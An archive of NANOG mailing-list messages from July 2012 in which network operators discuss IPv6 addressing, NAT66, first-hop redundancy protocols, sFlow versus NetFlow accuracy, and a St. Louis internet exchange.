------- This isn't specific to you Owen, but the group in general. I have been around for a while. Not as long as some others here. NAT is a feature and it does have a place. Security. I'm sorry that this frustrates people but security is a layered approach and it starts off simple. If you have a network that doesn't need exposure to the Internet or to someone else you can get fancy with anything from a FW to control source and destination or AD controls so only the accounting team can get in. Sure. They all work. You can also NAT them. Make them invisible. Or null the traffic. The more fundamental the point of defense is the easier it is to understand and sometimes the more difficult it becomes to bypass. Complex security adds a greater potential for vulnerabilities. If you want to protect your car stereo you could lock a cover over it right? But if you could, wouldn't you also just lock the car doors when you leave it? I'm not going to tell you that NAT guarantees you anything. We all know nothing is foolproof.
But it is a fundamental feature that works for that purpose. Do I plan on NATting our edge Internet traffic? No. Not for IPv6. Because the protocol was not designed for it. But have I ruled it out as an option for some environments? No. Bring on the flames. I know this is going to get people stirred up. I promise not to ignore the thread....

From valdis.kletnieks at vt.edu Mon Jul 16 11:34:48 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 16 Jul 2012 12:34:48 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Mon, 16 Jul 2012 11:09:28 -0500." <50043CB8.20302@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> Message-ID: <161620.1342456488@turing-police.cc.vt.edu>

On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said: > -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there > if there weren't enough customers asking for it. Are all the customers naive? > I doubt it. They have their reasons. I agree with your "purist" definition and > did not say I was using it. My point is that vendors are still rolling out base > line features even today.

Sorry to tell you this, but the customers *are* naive and asking for stupid stuff. They think they need NAT under IPv6 because they suffered with it in IPv4 due to addressing issues or a (totally perceived) security benefit (said benefit being *entirely* based on the fact that once you get NAT working, you can build a stateful firewall for essentially free). The address crunch is gone, and stateful firewalls exist, so there's no *real* reason to keep pounding your head against the wall other than "we've been doing it for 15 years".
From bhmccie at gmail.com Mon Jul 16 12:10:56 2012 From: bhmccie at gmail.com (-Hammer-) Date: Mon, 16 Jul 2012 12:10:56 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <161620.1342456488@turing-police.cc.vt.edu> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> Message-ID: <50044B20.10908@gmail.com>

I agree. Most are naive. Not all.

-Hammer- "I was a normal American nerd" -Jack Herer

On 7/16/2012 11:34 AM, valdis.kletnieks at vt.edu wrote: > On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said: >> -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there >> if there weren't enough customers asking for it. Are all the customers naive? >> I doubt it. They have their reasons. I agree with your "purist" definition and >> did not say I was using it. My point is that vendors are still rolling out base >> line features even today. > Sorry to tell you this, but the customers *are* naive and asking for stupid > stuff. They think they need NAT under IPv6 because they suffered with it in > IPv4 due to addressing issues or a (totally perceived) security benefit (said > benefit being *entirely* based on the fact that once you get NAT working, you > can build a stateful firewall for essentially free). The address crunch is > gone, and stateful firewalls exist, so there's no *real* reason to keep > pounding your head against the wall other than "we've been doing it for 15 > years".
From straterra at fuhell.com Mon Jul 16 12:26:18 2012 From: straterra at fuhell.com (Thomas York) Date: Mon, 16 Jul 2012 13:26:18 -0400 Subject: IPv6 Toolkit v1.2: Latest snapshot, and git repo In-Reply-To: <1123039916.37623.1342452079021.JavaMail.root@network1.net> References: <5002DA03.6060007@gont.com.ar> <1123039916.37623.1342452079021.JavaMail.root@network1.net> Message-ID: <036601cd6378$1d23c040$576b40c0$@fuhell.com>

Also compiles and works fine for me on 10.7.

-- Thomas York

-----Original Message----- From: Randy Carpenter [mailto:rcarpen at network1.net] Sent: Monday, July 16, 2012 11:21 AM To: Fernando Gont Cc: NANOG Subject: Re: IPv6 Toolkit v1.2: Latest snapshot, and git repo

Appears to compile fine on Mac OS X 10.7. The resulting programs run, but I have not tried any real testing with actual data.

thanks, -Randy

----- Original Message ----- > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Folks, > > I've posted a snapshot (tarball) of my working copy of the IPv6 > toolkit. The tarball is available at: > > > Additionally, I've created a git repository for the toolkit, such that > collaboration is improved. The git repo is available at: > > > If you have access to a Mac OS box, please try to compile the tools, > and let me know if you find any errors (or let me know if they > compiled cleanly). If you can also run the tools according to some of > the examples in the manuals (and report any problems), that would be > great, too. > > P.S.: If you've sent patches and your patches have not yet been > applied, most likely it just means that I'm catching-up with them > (feel free to resend!). > > Thanks!
> > Best regards,-- > Fernando Gont > e-mail: fernando at gont.com.ar || fgont at si6networks.com PGP Fingerprint: > 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

From rps at maine.edu Mon Jul 16 12:28:26 2012 From: rps at maine.edu (Ray Soucy) Date: Mon, 16 Jul 2012 13:28:26 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <161620.1342456488@turing-police.cc.vt.edu> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> Message-ID:

""" Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being able to eliminate NAT. NAT was a necessary evil for IPv4 address conservation. It has no good use in IPv6. """

NAT still has its uses; virtualization and cloud infrastructure being one of the most legitimate. Certain kinds of NAT, such as RFC 6296, are very useful, and one of the best methods we have today of delivering IPv6 to smaller networks who wish to have private address space internally ... be it for consistency, ISP independence, multi-homing, or just downright operational parity.
I really think all this focus on anti-NAT talk has held back adoption (and FWIW I used to be one of the people banging the anti-NAT drum the loudest). Keep in mind the collective attitude in communities like this one about NAT for v6 trickles down into decisions made elsewhere; the Linux Netfilter team, for example, is met by a lot of hostility when they talk about including things like 6296 in ip6tables; and as a result it's been left out (even though it's functional).

-- Ray Soucy Epic Communications Specialist Phone: +1 (207) 561-3526 Networkmaine, a Unit of the University of Maine System http://www.networkmaine.net/

From rchayapa at cisco.com Mon Jul 16 13:26:08 2012 From: rchayapa at cisco.com (Rajendra Chayapathi (rchayapa)) Date: Mon, 16 Jul 2012 18:26:08 +0000 Subject: using "reserved" IPv6 space In-Reply-To: <50043CB8.20302@gmail.com> Message-ID:

On the HSRP/ND part, this all falls in the First Hop redundancy arena and can be achieved via any of the following, and each has its merits and cons..

1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the faster failover
2) Using any of the First hop redundancy protocols (HSRP, VRRP, GLBP)
3) Default route selection.

So depending on the network convergence need etc, any or a combination of the above can be looked at.

Thx Rajendra

On 7/16/12 9:09 AM, "-Hammer-" wrote: >Inline - > >-Hammer- > >"I was a normal American nerd" >-Jack Herer > > >1) (This one is currently a personal issue) I am still building up a true >IPv6 skillset. Yes, I understand it for the most part but now is the time >to apply it. > >Frankly, IMHO, the best way to build up a truly useful IPv6 skill set is >to start applying what you don't know and see what happens. For the most >part, you will find that it is truly "96 more bits, no magic". > >------- Completely agree. Been playing in GNS3 on the basics and we're >starting to play in a full lab soon.
> >> 2) All the reading you do doesn't prepare you for application and the >>vendors aren't necessarily helping. Feature parity across platforms and >>vendors beyond just "interface x/x/x" and "ipv6 address >>fe80:blah:blah::babe:1" seems to seriously be lacking. When I try to >>take what I understand and apply it beyond the basics I often see >>hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If >>it's working for you hit me offline. Example2? Any vendor product beyond >>a router or switch. CheckPoint FW? F5 LB? Netscaler LB or AF? The WAN >>guys may be rolling deep in IPv6 but not everyone else. I just got an EA >>this morning from CheckPoint for NAT66. This should have been ready for >>prime time years ago. I guess the vendors weren't getting the push from >>the customers so there was no need to make an effort.... > >You probably meant 2001:db8:b1aa:b1aa::babe:1 (blah isn't hex and >fe80::/10 is link local. 2001:db8::/16 is the example prefix) > >------- I stand corrected. :) > > For the most part, HSRP really isn't even necessary or useful in IPv6 >since ND should take care of what HSRP did for IPv4. > > >------- On the WAN? Sure. On my Internet facing equipment? I disagree. >RAs and ND and all that fun stuff needs to be suppressed. > > > I believe F5 has rolled out IPv6 in a subset of their products and that >you need pretty recent versions to get IPv6 functionality from them. The >ARIN Wiki (http://www.getipv6.info) may be a good source of information >on various vendor statuses. Contribute what you know/find out there as >well, please. > > >------- Yes they have and NetScaler is running solid as well. My issues >are when you go beyond basic features of any product with IPv6 things get >tricky. I need content switching with redirects and whatnot and based on >the few efforts I've seen so far I'm not optimistic. Again, routers and >switches seem to be further ahead than other products. They all have >their limits in advanced features. 
Back to my ASR comment. > > >Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is >being able to eliminate NAT. NAT was a necessary evil for IPv4 address >conservation. It has no good use in IPv6. > > >-------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be >there if there weren't enough customers asking for it. Are all the >customers naive? I doubt it. They have their reasons. I agree with your >"purist" definition and did not say I was using it. My point is that >vendors are still rolling out baseline features even today. > >> 3) When I'm not preoccupied attempting to digest the fundamentals I am >>well aware of the retooling of the brain that is required for this in a >>network design. Last year I reached out to Team Cymru and attempted to >>build an IPv6 router template to match their IPv4 template. It was a >>completely different animal. Ironically most of the STIGs and NSA >>reference garbage I used was ten years old but still applied. After >>going thru all those docs my brain hurt trying to orient my ACLs >>properly and go thru all the different attributes you want to block >>where and when. Then I spent some time trying to work our design schemas >>for our ARIN space with the WAN design team. What I'm trying to say is >>that Roberts comments are spot on. It is a very different way of >>thinking on a small scale and a large scale and you can't take your IPv4 >>logic and apply it. I've tried and it's just slowing me down. > >Yes and no. If you have been doing IPv4 long enough to remember pre-NAT >IPv4, then, you just need to remember some of the old ways of IPv4. If >you have no recollection of IPv4 without NAT, then, you are correct, it >is a huge paradigm shift to go back to the way the internet is supposed >to have been before we ran out of addresses. > > >------- This isn't specific to you Owen, but the group in general. I have >been around for a while. Not as long as some others here. 
NAT is a >feature and it does have a place. Security. I'm sorry that this >frustrates people but security is a layered approach and it starts off >simple. If you have a network that doesn't need exposure to the Internet >or to someone else you can get fancy with anything from a FW to control >source and destination or AD controls so only the accounting team can get >in. Sure. They all work. You can also NAT them. Make them invisible. Or >null the traffic. The more fundamental the point of defense is the easier >it is to understand and sometimes the more difficult it becomes to >bypass. Complex security adds a greater potential for vulnerabilities. If >you want to protect your car stereo you could lock a cover over it right? >But if you could, wouldn't you also just lock the car doors when you >leave it? I'm not going to tell you that NAT guarantees you anything. We >all know nothing is foolproof. But it is a fundamental feature that works >for that purpose. Do I plan on NATting our edge Internet traffic? No. Not >for IPv6. Because the protocol was not designed for it. But have I ruled >it out as an option for some environments? No. > >Bring on the flames. I know this is going to get people stirred up. I >promise not to ignore the thread.... > > > > > From fred at cisco.com Mon Jul 16 14:06:45 2012 From: fred at cisco.com (Fred Baker (fred)) Date: Mon, 16 Jul 2012 19:06:45 +0000 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: On Jul 13, 2012, at 8:05 AM, TJ wrote: > On Fri, Jul 13, 2012 at 10:38 AM, -Hammer- wrote: > >> OK. I'm pretty sure I'm gonna get some flak for this but I'll share this >> question and it's background anyway. Please be gentle. >> >> In the past, with IPv4, we have used reserved or "non-routable" space >> Internally in production for segments that won't be seen anywhere else. >> Examples? A sync VLAN for some FWs to share state. 
An IBGP link between >> routers that will never be seen or advertised. In those cases, we have >> often used 192.0.2.0/24. It's reserved and never used and even if it did >> get used one day we aren't "routing" it internally. It's just on segments >> where we need some L3 that will never be seen. >> >> On to IPv6 >> >> I was considering taking the same approach. Maybe using 0100::/8 or >> 1000::/4 or A000::/3 as a space for this. >>
>
> Would using "just" Link Locals not be sufficient?

If they're on the same link, of course. My understanding of the question said "they're not on the same link".

> (Failing that, as others noted, ULAs are the next "right" answer ... )
>
> /TJ

From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Mon Jul 16 14:39:46 2012 From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver) Date: Mon, 16 Jul 2012 21:39:46 +0200 Subject: using "reserved" IPv6 space In-Reply-To: References: Message-ID: <2059648.BTFFAkdkz4@lsdsrv>

On Monday 16 July 2012 18:26:08 Rajendra Chayapathi wrote: > On the HSRP/ND part, this all falls in the First Hop redundancy arena > and can be achieved via any of the following and each has its merits and > cons.. > > 1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the > faster failover > 2) Using any of the First hop redundancy protocols (HSRP, VRRP, GLBP) > 3) Default route selection. >

In all honesty, I think using ND as the failover method is a generally bad idea - you have no way of ensuring all endpoints take note of or honour the router preference flag.

Additionally, having a 1 second validity lifetime is going to create a lot of ICMPv6 spam across the segment - big deal? perhaps not. But when contrasted with the fact that it can be wholly avoided using one of the aforementioned redundancy protocols, why would you do it?

Additionally, as an alternative to RAs, you can simply point default at the all-routers anycast address.
Regards, Oliver

From james.braunegg at micron21.com Mon Jul 16 17:01:14 2012 From: james.braunegg at micron21.com (James Braunegg) Date: Mon, 16 Jul 2012 22:01:14 +0000 Subject: Real world sflow vs netflow? In-Reply-To: <50032DA2.9020108@foobar.org> References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID:

Dear All

Around a year ago I had the same debate sflow vs netflow vs snmp port counters. Read lots of stories, lots of myths, lots of good information.

My Conclusion

In the end I did real life testing comparing each platform.

We routed live traffic (about 250mbits) from our Cisco 7200 G2 routers through Brocade MLXe routers and exported netflow from the Cisco platform and sFlow from the Brocade platform.

Each router sent netflow/sflow traffic to two collectors on independent hardware (same specifications) running the same collection netflow analyzer software.

The end result was after hours of testing, or even days and weeks of testing there was no significant difference between traffic volumes netflow was showing vs sflow. I.e. less than 0.5% variance between each environment.

That being said, both netflow and sflow under-read by about 3% when compared to snmp port counters, which we put to the conclusion was broadcast traffic etc which the routers didn't see / flow.

Regardless, if you're going to bill from netflow or sflow, in our test environment we saw no significant difference between either platform.

Hope that helps

Kindest Regards

James Braunegg W: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616 E: james.braunegg at micron21.com | ABN: 12 109 977 666

This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee.
If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer.

-----Original Message----- From: Nick Hilliard [mailto:nick at foobar.org] Sent: Monday, July 16, 2012 6:53 AM To: nanog at nanog.org Subject: Re: Real world sflow vs netflow?

On 14/07/2012 09:30, Łukasz Bromirski wrote: > And that's the biggest problem with sFlow. Packets are sampled, not > flows. You may miss the big or important flow, you don't have > visibility into every conversation going through the device.

Unless you enable sampling, which is pretty much necessary for non-trivial traffic volumes.

> NetFlow supports IPv6. As well as L2 traffic (v9), MPLS, multicast and > so on.

It does, depending on hardware variety, but you need specific platform support for each packet variety (v4 / v6 / mpls / etc), and platform support for this can be very dodgy. You don't need this with sflow - it just punts 1 in N raw packets out to your collector, and the statistical assumptions which were made by the networking device are well documented. I've never seen documentation on the sampling technique used for each netflow implementation.

> The measurements provided by sFlow are only an approximation of the real > traffic and while it may be acceptable on LAN links where details > don't matter as much, it's hardly good enough to present a real view > on the WAN links. > > sFlow was built to work on switches and provide "some" accuracy, it's > not good enough (unless you do sampling on a 1:5-1:10 basis) to do > billing or some detailed analysis of traffic:

Depends on how detailed your requirements are. For billing, most people don't classify by packet analysis, but rather by byte count which can be handled by snmp port counters. If you need to do something fancier, non-sampled netflow is indeed good enough for billing.

> http://www.inmon.com/pdf/sFlowBilling.pdf > > You can use it to *estimate* the traffic, detect DDoS, sure.
But the > data & scaling used by sFlow (and additionally tricks used by ASIC > vendors implementing it in the hardware) can't change the fundamental > difference - sFlow is really sPacket, as it doesn't deal with flows. agreed, the name is wrong. > NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling > accuracy and things like that, but working with flows is more accurate. Depends on your use case. For large traffic values, you run into the law of large numbers and you can get accurate visibility into what's happening on your network. Certainly, netflow _can_ offer amazingly precise visibility into your network. But the trade-off is that you need specialised hardware to do this on your line cards or your forwarding engine. This drives up both the capex (extra hardware) and the opex (tcam is power hungry) of your network. sflow is much cheaper to implement as you're not maintaining any state on your chassis. You're just picking out a packet every so often. The current generation of high end service provider hardware (juniper mx-3d, cisco sup2t / n7k / asr9k) is pretty much the first generation of hardware which doesn't have crippling netflow limitations, such as poor support for v6 / mpls, too small cache sizes, etc. This fact alone should provide a good indication of how difficult it is to implement it well on fast boxes. sflow is simpler, cheaper and in many cases is simply a better choice if you don't need drill-down into every single flow going through your networking. Nick From rchayapa at cisco.com Mon Jul 16 17:02:50 2012 From: rchayapa at cisco.com (Rajendra Chayapathi (rchayapa)) Date: Mon, 16 Jul 2012 22:02:50 +0000 Subject: using "reserved" IPv6 space In-Reply-To: <2059648.BTFFAkdkz4@lsdsrv> Message-ID: True .. Your point of the ICMPv6 storm is on mark and is one of the drawbacks for this solution. 
On 7/16/12 12:39 PM, "Oliver" wrote: >On Monday 16 July 2012 18:26:08 Rajendra Chayapathi wrote: >> On the HSRP/ND part , this all falls in the First Hop redundancy areana >> and can be achieved via any of the following and each has its merits and >> cons.. >> >> 1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the >> faster failover >> 2) Using any of the First hop redundancy protocol ( HSRP, VRRP , GLBP) >> 3) Default route selection. >> > >In all honesty, I think using ND as the failover method is a generally >bad >idea - you have no way of ensuring all endpoints take note of or honour >the >router preference flag. > >Additionally, having a 1 second validity lifetime is going to create a >lot of >ICMPv6 spam across the segment - big deal? perhaps not. But when >contrasted >with the fact that it can be wholly avoided using one of the >aforementioned >redundancy protocols, why would you do it? > >Additionally, as an alternative to RAs, you can simply point default at >the >all-routers anycast address. > >Regards, >Oliver > From jay.hanke at mankatonetworks.com Mon Jul 16 17:23:57 2012 From: jay.hanke at mankatonetworks.com (Jay Hanke) Date: Mon, 16 Jul 2012 17:23:57 -0500 Subject: St Louis Internet Exchange Message-ID: After a bit of googling, I found some references to an Internet Exchange in St. Louis, MO called the St. Louis Regional Exchange. Is this project still active? Thanks, Jay From dhubbard at dino.hostasaurus.com Mon Jul 16 17:25:31 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 16 Jul 2012 18:25:31 -0400 Subject: Real world sflow vs netflow? References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: From: James Braunegg [mailto:james.braunegg at micron21.com] > > Dear All > > Around a year ago I had the same debate sflow vs netflow vs > snmp port counters. read lots of stories lots of myths lots > of good information. 
My Conclusion > > In the end I did real life testing comparing each platform > > We routed live traffic (about 250mbits) from our Cisco 7200 > G2 routers though Brocade MLXe routers and exported netflow > from the Cisco platform and sFlow from the Brocade platform. > > Each router sent netflow/sflow traffic to two collectors on > independent hardware (same specifications) running the same > collection netflow analyzer software. > > The end result was after hours of testing, or even days and > weeks of testing there was no significant difference between > traffic volumes netflow was showing vs slfow. Ie less than > 0.5% variance between each environment. > > That being said both netflow and sflow both under read by > about 3% when compared to snmp port counters, which we put to > the conclusion was broadcast traffic etc which the routers > didn't see / flow. > > Regardless if you're going to bill from netflow or sflow in > our test environment we saw no significant difference > between either platform. What are your thoughts on the non-billing aspects after your comparison testing; if you are/were using it for those purposes? We don't use our current netflow for billing, just for security investigation and (ideally) early alerting of abnormal activity like port scans, compromised apps on servers, etc. Thanks, David From james.braunegg at micron21.com Mon Jul 16 17:54:09 2012 From: james.braunegg at micron21.com (James Braunegg) Date: Mon, 16 Jul 2012 22:54:09 +0000 Subject: Real world sflow vs netflow? In-Reply-To: References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: Dear David >From a visibility point of view, we obtain as much information as we require to know exactly what's occurring on our network where and when in real-time. We know what's happening, on any interface on any network at any time. - that being said for us the most important visibility is all about the flow of traffic and packet counts.... 
The security side should be done at the firewall level! If anyone wants a demo of our sFlow setup, happy to show you via a TeamViewer session or something! By the way, we are using sFlow now.

Kindest Regards

James Braunegg W: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616 E: james.braunegg at micron21.com | ABN: 12 109 977 666

-----Original Message----- From: David Hubbard [mailto:dhubbard at dino.hostasaurus.com] Sent: Tuesday, July 17, 2012 8:26 AM To: nanog at nanog.org Subject: RE: Real world sflow vs netflow?

From: James Braunegg [mailto:james.braunegg at micron21.com] > > Dear All > > Around a year ago I had the same debate sflow vs netflow vs snmp port > counters. read lots of stories lots of myths lots of good information. > My Conclusion > > In the end I did real life testing comparing each platform > > We routed live traffic (about 250mbits) from our Cisco 7200 > G2 routers through Brocade MLXe routers and exported netflow from the > Cisco platform and sFlow from the Brocade platform. > > Each router sent netflow/sflow traffic to two collectors on > independent hardware (same specifications) running the same collection > netflow analyzer software. > > The end result was after hours of testing, or even days and weeks of > testing there was no significant difference between traffic volumes > netflow was showing vs sflow. I.e. less than 0.5% variance between each > environment.
>
> That being said both netflow and sflow both under read by about 3% when
> compared to snmp port counters, which we put to the conclusion was
> broadcast traffic etc which the routers didn't see / flow.
>
> Regardless if you're going to bill from netflow or sflow in our test
> environment we saw no significant difference between either platform.

What are your thoughts on the non-billing aspects after your comparison
testing; if you are/were using it for those purposes?  We don't use our
current netflow for billing, just for security investigation and (ideally)
early alerting of abnormal activity like port scans, compromised apps on
servers, etc.

Thanks,

David

From ler762 at gmail.com Mon Jul 16 20:55:40 2012
From: ler762 at gmail.com (Lee)
Date: Mon, 16 Jul 2012 21:55:40 -0400
Subject: NAT66 was Re: using "reserved" IPv6 space
Message-ID:

On 7/16/12, Owen DeLong wrote:
>
> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being
> able to eliminate NAT. NAT was a necessary evil for IPv4 address
> conservation. It has no good use in IPv6.

NAT is good for getting the return traffic to the right firewall.  How
else do you deal with multiple firewalls & asymmetric routing?

Yes, it's possible to get traffic back to the right place without NAT.
But is it as easy as just NATing the outbound traffic at the firewall?

Lee

From ler762 at gmail.com Mon Jul 16 21:04:30 2012
From: ler762 at gmail.com (Lee)
Date: Mon, 16 Jul 2012 22:04:30 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: <20120716035812.87659.qmail@joyce.lan>
References: <20120716035812.87659.qmail@joyce.lan>
Message-ID:

On 7/15/12, John Levine wrote:
>> I feel like I should be able to do something really nice with an
>> absurdly large address space. But lack of imagination or whatever.. I
>> haven't come up with anything that really appeals to me.
>
> Use a fresh IP for every HTTP request, email message, and IM. Just think of
> how well you can do error management.

hrmm...
nope, can't think of a single thing.  Then again, I'm on the routing &
switching team at work, so things like HTTP requests, email messages, and
IM are just different types of user traffic that needs to be routed to me.

Recall the message I was responding to:

>>> There is a HUGE difference between IPv4 and IPv6 thinking. We've all
>>> been living in an austerity regime for so long that we've completely
>>> forgotten how to leave parsimony behind. Even those of us who worked
>>> at companies that were summarily handed a Class B when we mumbled
>>> something about "internal subnetting" have a really hard time
>>> remembering how to act when we suddenly don't have to answer for every
>>> single host address and can design a network to conserve other things
>>> (like our brain cells).

I read it as design a network >>addressing scheme<< to conserve other
things & was hoping someone could share new ways of looking at it.  I
feel like I'm stuck in "IPv4 think" with an addressing plan that's
basically

  Each site gets a /48.  Even the ones with less than 200 people.
  Each subnet is assigned a /64 except for loopbacks & p2p subnets.
  First 256 subnets in each /48 are reserved for things like loopback
    addresses, p2p links, switch management subnets, etc.
  High order 4 bits of the site address are used for the subnet type.
    So a /52 tells you the site and if it's users, printers, servers, IP
    phones, or whatever.

Which is *boring*.  Nothing novel, no breaking out of "IPv4 think" aside
from massively wasting address space.  Which brings me back around to my
original request for suggestions.  What's the new way of looking at
designing a network addressing scheme?
Regards,
Lee

From kauer at biplane.com.au Mon Jul 16 21:35:36 2012
From: kauer at biplane.com.au (Karl Auer)
Date: Tue, 17 Jul 2012 12:35:36 +1000
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <20120716035812.87659.qmail@joyce.lan>
Message-ID: <1342492536.6281.149.camel@karl>

On Mon, 2012-07-16 at 22:04 -0400, Lee wrote:
> Each site gets a /48.  Even the ones with less than 200 people.
> [...]
> Which is *boring*.  Nothing novel, no breaking out of "IPv4 think"
> aside from massively wasting address space.

It's only a waste if you get nothing for it. By using /64 everywhere you
get a more homogeneous network, easier to administer, manage, document,
maintain... There are similar advantages, writ larger, to using /48 for
every site.

Whether you have 2, 20, 200, 2000 or 20,000 hosts in a /64 subnet, you
have still only used 0% of it, to a dozen or more decimal places.
IPv4-think says that's a waste. IPv6-think says "great - all my subnets
are large enough". Resizing IPv4 subnets is common; resizing IPv6
subnets will be rare.

IPv4-think is conserving addresses. IPv6-think is conserving subnets. We
don't buy dining chairs based on the number of atoms in them - we buy
enough to seat the people who need seating.

Regards, K.

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)                   http://www.biplane.com.au/kauer
GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017
Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687
From woody at pch.net Mon Jul 16 21:36:08 2012
From: woody at pch.net (Bill Woodcock)
Date: Mon, 16 Jul 2012 19:36:08 -0700
Subject: St Louis Internet Exchange
In-Reply-To:
References:
Message-ID:

On Jul 16, 2012, at 3:23 PM, Jay Hanke wrote:
> After a bit of googling, I found some references to an Internet
> Exchange in St. Louis, MO called the St. Louis Regional Exchange.
> Is this project still active?

It appears to be dead.  The web site redirects to a commercial colo, and
the last few ISPs appear to have departed at the end of 2008, after about
two years of activity.

https://prefix.pch.net/applications/ixpdir/detail.php?exchange_point_id=350

If anyone has any better information, please let us know.

                                -Bill

From marka at isc.org Mon Jul 16 21:40:40 2012
From: marka at isc.org (Mark Andrews)
Date: Tue, 17 Jul 2012 12:40:40 +1000
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To: Your message of "Mon, 16 Jul 2012 21:55:40 -0400."
References:
Message-ID: <20120717024040.7A074228E3B4@drugs.dv.isc.org>

In message , Lee writes:
> On 7/16/12, Owen DeLong wrote:
> >
> > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being
> > able to eliminate NAT. NAT was a necessary evil for IPv4 address
> > conservation. It has no good use in IPv6.
>
> NAT is good for getting the return traffic to the right firewall.  How
> else do you deal with multiple firewalls & asymmetric routing?

Traffic goes where the routing protocols direct it.  NAT doesn't
help this and may actually hinder as the source address cannot be
used internally to direct traffic to the correct egress point.
Instead you need internal routers that have to try to track traffic
flows rather than making simple decisions based on source and
destination addresses.

Applications that use multiple connections may not always end up
with consistent external source addresses.

> Yes, it's possible to get traffic back to the right place without NAT.
> But is it as easy as just NATing the outbound traffic at the
> firewall?

It can be and it can be easier to debug without NAT mangling addresses.

The only thing helpful NAT66 does is delay the externally visible
source address selection until the packet passes the NAT66 box.

Mark
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742                 INTERNET: marka at isc.org

From shortdudey123 at gmail.com Mon Jul 16 21:56:29 2012
From: shortdudey123 at gmail.com (Grant Ridder)
Date: Mon, 16 Jul 2012 21:56:29 -0500
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
References: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
Message-ID:

If you are running an HA pair, why would you care which box it went back
through?

-Grant

On Monday, July 16, 2012, Mark Andrews wrote:

>
> In message squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee
> writes:
> > On 7/16/12, Owen DeLong > wrote:
> > >
> > > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is
> being
> > > able to eliminate NAT. NAT was a necessary evil for IPv4 address
> > > conservation. It has no good use in IPv6.
> >
> > NAT is good for getting the return traffic to the right firewall.  How
> > else do you deal with multiple firewalls & asymmetric routing?
>
> Traffic goes where the routing protocols direct it.  NAT doesn't
> help this and may actually hinder as the source address cannot be
> used internally to direct traffic to the correct egress point.
>
> Instead you need internal routers that have to try to track traffic
> flows rather than making simple decisions based on source and
> destination addresses.
>
> Applications that use multiple connections may not always end up
> with consistent external source addresses.
>
> > Yes, it's possible to get traffic back to the right place without NAT.
> > But is it as easy as just NATing the outbound traffic at the
> > firewall?
>
> It can be and it can be easier to debug without NAT mangling
> addresses.
>
> The only thing helpful NAT66 does is delay the externally visible
> source address selection until the packet passes the NAT66 box.
>
> Mark
> --
> Mark Andrews, ISC
> 1 Seymour St., Dundas Valley, NSW 2117, Australia
> PHONE: +61 2 9871 4742                 INTERNET: marka at isc.org
>
>

From marka at isc.org Mon Jul 16 22:12:01 2012
From: marka at isc.org (Mark Andrews)
Date: Tue, 17 Jul 2012 13:12:01 +1000
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To: Your message of "Mon, 16 Jul 2012 21:56:29 EST."
References: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
Message-ID: <20120717031201.BAE38228E945@drugs.dv.isc.org>

In message , Grant Ridder writes:
>
> If you are running an HA pair, why would you care which box it went back
> through?
>
> -Grant

It still doesn't change the argument.  You still need to have flow
based routers or you may choose the wrong egress point and if you
need NAT66 you have 4+ upstream connections though two of them may
be tunnels.  You also need a protocol to keep the HA pair state
tables in sync.
Mark
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742                 INTERNET: marka at isc.org

